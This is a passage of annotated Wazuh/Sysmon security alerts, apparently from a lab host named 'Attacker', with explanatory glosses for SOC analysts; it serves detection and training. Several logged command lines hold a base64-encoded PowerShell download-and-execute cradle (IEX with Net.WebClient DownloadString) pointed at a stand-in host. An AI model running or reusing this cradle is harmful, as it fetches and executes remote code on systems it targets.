data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.007+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.007+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.794207
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:51.4872058Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280774
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:33:51.481 ProcessGuid: {94294ddc-bc4e-680a-450a-000000000e00} ProcessId: 9340 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_iirz44hw.ut4.ps1 CreationUtcTime: 2025-04-24 22:33:51.481 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:51.481
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc4e-680a-450a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9340
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_iirz44hw.ut4.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:33:51.481
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.378+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.378+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.796971
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:59.8990721Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280869
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:33:58.812 ProcessGuid: {94294ddc-bc56-680a-4d0a-000000000e00} ProcessId: 10156 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc54-680a-4a0a-000000000e00} ParentProcessId: 12404 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:58.812
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc56-680a-4d0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10156
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc54-680a-4a0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12404
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.379+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.379+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.805041
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:00.0990056Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280870
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:34:00.059 ProcessGuid: {94294ddc-bc56-680a-4d0a-000000000e00} ProcessId: 10156 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_e3qarsmw.y43.ps1 CreationUtcTime: 2025-04-24 22:34:00.059 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:00.059
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc56-680a-4d0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10156
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_e3qarsmw.y43.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:34:00.059
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.609+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.609+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.807809
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:04.5719304Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280933
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:34:03.416 ProcessGuid: {94294ddc-bc5b-680a-510a-000000000e00} ProcessId: 8180 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc59-680a-4f0a-000000000e00} ParentProcessId: 11636 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:03.416
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc5b-680a-510a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8180
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

